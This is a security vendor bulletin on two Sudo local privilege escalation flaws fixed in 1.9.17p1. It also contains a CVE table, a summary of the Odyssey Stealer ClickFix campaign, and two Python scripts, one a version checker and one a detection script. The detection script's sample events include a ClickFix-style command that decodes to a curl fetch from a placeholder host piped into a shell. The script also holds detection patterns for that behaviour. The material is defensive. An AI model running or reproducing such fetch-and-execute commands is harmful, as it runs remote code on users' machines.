Critical Sudo Flaws Allow Local Privilege Escalation on Linux

Information:
Sudo is a command-line tool that lets a low-privileged user run commands as another user, typically the superuser. The idea is to enforce the principle of least privilege: instead of handing a user a root shell, an administrator grants specific users the right to run specific administrative commands with elevated privileges, and nothing more.
The command is configured through a file called "/etc/sudoers," which determines "who can run what commands as what users on what machines and can also control special things such as whether you need a password for particular commands."
Incident:
Security researcher Rich Mirch has uncovered two local privilege escalation flaws in Sudo, the widely used Linux utility, that allow an unprivileged local user to gain root on vulnerable Linux and Unix-like systems.
Both vulnerabilities are reported to be reachable under the default Sudo configuration. One of them lies in Sudo's chroot option, which the Sudo team plans to remove in a future release because of its complexity and the risk it carries.
Recommendation:
The vulnerabilities have been addressed in Sudo version 1.9.17p1, released at the end of June 2025. Advisories have also been issued by the major Linux distributions, since Sudo ships installed on most of them.
Users are advised to apply the fixes and make sure that Linux systems, desktop and server alike, are updated to the latest packages.
Security systems remain the priority: keep monitoring them as usual.
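As an added check (example code written for this bulletin, not code from the Sudo project), the script below compares an installed Sudo version string with the fixed release 1.9.17p1 named above and lists any sudoers rules that use the CHROOT= option, the feature the Sudo team plans to remove. The sample sudoers content is constructed for the demonstration; the real file is read only when the script has permission to do so.

```python
"""Check an installed sudo version against the fixed release 1.9.17p1 and
list sudoers rules that use CHROOT=. Added example for this bulletin, not
part of the Sudo project; SAMPLE_SUDOERS is constructed, not from any host."""
import re
import subprocess

FIXED_VERSION = "1.9.17p1"


def parse_sudo_version(text):
    """Turn 'Sudo version 1.9.15p5' (or bare '1.9.17p1') into a comparable tuple.
    '1.9.17' becomes (1, 9, 17, 0); '1.9.17p1' becomes (1, 9, 17, 1), so a
    plain 1.9.17 correctly sorts below the patched 1.9.17p1."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?", text)
    if not m:
        raise ValueError(f"no sudo version found in {text!r}")
    major, minor, patch, p = m.groups()
    return (int(major), int(minor), int(patch), int(p or 0))


def is_patched(version_text, fixed=FIXED_VERSION):
    """True when the version string is at or above the fixed release."""
    return parse_sudo_version(version_text) >= parse_sudo_version(fixed)


def installed_sudo_version():
    """First line of `sudo --version` (e.g. 'Sudo version 1.9.15p5'), or None."""
    try:
        out = subprocess.run(["sudo", "--version"], capture_output=True,
                             text=True, check=False)
    except FileNotFoundError:
        return None
    return out.stdout.splitlines()[0] if out.stdout else None


def chroot_rules(sudoers_text):
    """(line_number, line) for non-comment sudoers lines that use CHROOT=.
    Anything after '#' is treated as a comment; a rule inside a comment is ignored."""
    hits = []
    for n, line in enumerate(sudoers_text.splitlines(), 1):
        code = line.split("#", 1)[0]
        if "CHROOT=" in code:
            hits.append((n, line.strip()))
    return hits


# Constructed sample sudoers content for the demonstration (not from a real host).
SAMPLE_SUDOERS = """\
Defaults    env_reset
root        ALL=(ALL:ALL) ALL
%admin      ALL=(ALL) ALL
deploy      ALL=(ALL) CHROOT=/srv/jail /bin/sh   # chroot rule worth reviewing
# backup    ALL=(ALL) CHROOT=/backup /usr/bin/rsync   (commented out, ignored)
"""


def load_sudoers(path="/etc/sudoers"):
    """Read the real sudoers file when permitted (normally needs root);
    otherwise fall back to the constructed sample so the script still runs."""
    try:
        with open(path) as f:
            return f.read()
    except OSError:
        return SAMPLE_SUDOERS


if __name__ == "__main__":
    v = installed_sudo_version()
    if v:
        print(f"{v}: {'patched' if is_patched(v) else 'below 1.9.17p1, check distro advisory'}")
    for n, line in chroot_rules(load_sudoers()):
        print(f"sudoers line {n} uses CHROOT=: {line}")
```

Caveat: many distributions backport security fixes without changing the upstream version string, so a version below 1.9.17p1 from a distribution package is not conclusive on its own; confirm against the distribution's advisory or the package changelog. Rules in /etc/sudoers.d/ are not covered by the sample and should be checked the same way.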
For more information please contact:
Email: sales@inetms.co.th
065 149 2822 (Ms. Suphatson)
063 204 4534 (Ms. Atsamaphorn)
065 929 6330 (Ms. Kansinee)
061 387 9439 (Ms. Sirilak)
092 257 6902 (Ms. Narusorn)
Weekly Interesting CVE (EN)

| No. | CVE Name | Published Date (DD/MM/YYYY) | Last Update (DD/MM/YYYY) | Device/Application/OS Target | Attack Type | CVSS | Detail | Solution | Reference |
|---|---|---|---|---|---|---|---|---|---|
| 1 | CVE-2025-24471 | 10/6/2025 | 12/6/2025 | FortiOS 7.6.1 and below, 7.4.7 and below | Improper certificate validation | 6.5 | An improper certificate validation vulnerability in FortiOS 7.6.1 and below and 7.4.7 and below may allow an EAP-verified remote user to connect from FortiClient using a revoked certificate. | Upgrade to version 7.6.2 or above | |
| 2 | CVE-2025-47867 | 17/6/2025 | 17/6/2025 | Trend Micro Apex Central versions below 8.0.6955 | Local file inclusion | 7.5 | A local file inclusion vulnerability in a Trend Micro Apex Central widget in versions below 8.0.6955 could allow an attacker to include arbitrary files that are executed as PHP code, leading to remote code execution on affected installations. | Update to version 8.0.6955 or later | |
| 3 | CVE-2025-49218 | 17/6/2025 | 18/6/2025 | Trend Micro Endpoint Encryption PolicyServer versions before 6.0.0.4013 | Post-authentication SQL injection | 7.7 | A post-authentication SQL injection vulnerability in Trend Micro Endpoint Encryption PolicyServer versions before 6.0.0.4013 could allow an attacker to escalate privileges on affected installations. | Upgrade to version 6.0.0.4013 | https://success.trendmicro.com/en-US/solution/KA-0019928 |
| 4 | CVE-2025-33117 | 19/6/2025 | 19/6/2025 | IBM QRadar SIEM 7.5 through 7.5.0 UP12 IF01 | External control of file name or path | 9.1 | IBM QRadar SIEM 7.5 through 7.5.0 Update Package 12 could allow a privileged user to modify configuration files so that a malicious autoupdate file can be uploaded and used to execute arbitrary commands. | Upgrade to version 7.5.0 UP12 IF02 | |
| 5 | CVE-2025-3279 | 26/6/2025 | 26/6/2025 | GitLab CE/EE 10.7 before 17.11.5, 18.0 before 18.0.3, 18.1 before 18.1.1 | Denial of service | 6.5 | An issue has been discovered in GitLab CE/EE affecting all versions from 10.7 before 17.11.5, 18.0 before 18.0.3, and 18.1 before 18.1.1 that could allow authenticated attackers to create a DoS condition by sending crafted GraphQL requests. | Upgrade to version 17.11.5, 18.0.3 or 18.1.1 (or later) | https://nvd.nist.gov/vuln/detail/CVE-2025-3279 |
Malware News or Campaign IOC/IOA (EN)

| No | Campaign Name | Detection Date (DD/MM/YYYY) | Attack Type | Description | Mitigation/Remediation |
|---|---|---|---|---|---|
| 1 | macOS malware Poseidon Stealer rebranded as Odyssey Stealer | 26/06/2025 | Information stealer | Odyssey Stealer is a rebrand of Poseidon Stealer, a malware-as-a-service (MaaS) offering previously distributed through Google Ads in 2024. According to CYFIRMA, it is delivered in a ClickFix campaign that spread across financial websites, cryptocurrency news sites, and the Apple App Store. ClickFix impersonates a Cloudflare CAPTCHA and instructs the victim to paste a base64-encoded command into a terminal window to "prove they are not a robot". The command runs an Odyssey AppleScript that tricks the user into entering the device password, which is then used to decrypt Keychain credentials. The stealer collects app, wallet and browser passwords, desktop files, payment data, browsing history and session cookies, zips the data under /tmp/lovemrtrump and exfiltrates it. CYFIRMA has published IoCs for this campaign to support prevention and detection. | Block and hunt for the IoCs published by CYFIRMA (see reference); warn users never to paste commands from a CAPTCHA or "verification" page into a terminal. |

Ref: https://www.cyfirma.com/research/odyssey-stealer-the-rebrand-of-poseidon-stealer/
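The ClickFix lure and the Odyssey behaviours summarised in the row above translate into a few host-level detections. The Python below is an added example written for this bulletin (not CYFIRMA's code and not the campaign's), run over constructed process-execution events: the event field names and the exact AppleScript prompt text are assumptions, and the staging path is the one named in the description.

```python
"""Detection logic for the ClickFix lure and Odyssey Stealer behaviour
described above. Added example for this bulletin, not CYFIRMA's or the
campaign's code; event field names and the AppleScript prompt text are
assumptions, the staging path is the one named in the report summary."""
import base64
import re
import shlex

# The lure pastes a base64 blob that is decoded and piped straight into a shell.
BASE64_TO_SHELL = re.compile(
    r"base64\s+(?:-d|-D|--decode)\b[^|]*\|\s*(?:sh|bash|zsh|osascript)\b")
# Assumed shape of the AppleScript password prompt: a dialog with a hidden answer.
HIDDEN_ANSWER = re.compile(r"display dialog.*with hidden answer", re.IGNORECASE)
# Staging directory named in the CYFIRMA summary.
STAGING_DIR = "/tmp/lovemrtrump"

# Constructed sample events shaped like endpoint process telemetry (not real data).
LURE = base64.b64encode(b"curl -s http://example.invalid/x | osascript").decode()
SAMPLE_EVENTS = [
    {"id": 1, "user": "alice", "process": "bash", "cmdline": "ls -la ~/Documents"},
    {"id": 2, "user": "alice", "process": "bash",
     "cmdline": f"echo {LURE} | base64 -d | sh"},              # ClickFix paste
    {"id": 3, "user": "alice", "process": "osascript",
     "cmdline": "osascript -e 'display dialog \"Enter your password\" "
                "default answer \"\" with hidden answer'"},      # password prompt
    {"id": 4, "user": "alice", "process": "zip",
     "cmdline": f"zip -r {STAGING_DIR}/out.zip {STAGING_DIR}"},  # staging
    {"id": 5, "user": "bob", "process": "bash",
     "cmdline": "echo aGVsbG8= | base64 -d"},                   # decode only: benign
]


def decoded_base64_tokens(cmdline):
    """Decode base64-looking tokens (16+ chars) in a command line so the analyst
    sees what the victim was actually told to run; undecodable tokens are skipped."""
    try:
        tokens = shlex.split(cmdline)
    except ValueError:            # unbalanced quotes: fall back to whitespace split
        tokens = cmdline.split()
    out = []
    for tok in tokens:
        if len(tok) >= 16 and re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", tok):
            try:
                out.append(base64.b64decode(tok, validate=True).decode("utf-8"))
            except (ValueError, UnicodeDecodeError):
                pass
    return out


def match_rules(event):
    """Names of the ClickFix/Odyssey rules an event triggers (empty if none)."""
    cmd = event["cmdline"]
    fired = []
    if BASE64_TO_SHELL.search(cmd):
        fired.append("base64_decoded_to_shell")
    if "osascript" in cmd and HIDDEN_ANSWER.search(cmd):
        fired.append("applescript_password_prompt")
    if STAGING_DIR in cmd:
        fired.append("odyssey_staging_path")
    return fired


def triage(events):
    """Map event id -> (rules fired, decoded payloads) for events that fire a rule.
    Payloads are decoded only for the base64-to-shell rule, where they matter."""
    findings = {}
    for ev in events:
        rules = match_rules(ev)
        if rules:
            payloads = (decoded_base64_tokens(ev["cmdline"])
                        if "base64_decoded_to_shell" in rules else [])
            findings[ev["id"]] = (rules, payloads)
    return findings


if __name__ == "__main__":
    for event_id, (rules, payloads) in triage(SAMPLE_EVENTS).items():
        print(f"event {event_id}: {', '.join(rules)}")
        for p in payloads:
            print(f"    decoded payload: {p}")
```

The base64-to-shell rule is the one worth tuning first: the decode-only event (id 5) must not fire, while a decode piped into any interpreter should, since the lure depends on the victim never reading the command they paste. Decoding the blob in the alert gives the responder the real first-stage command without having to reproduce the paste.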
15 July 2025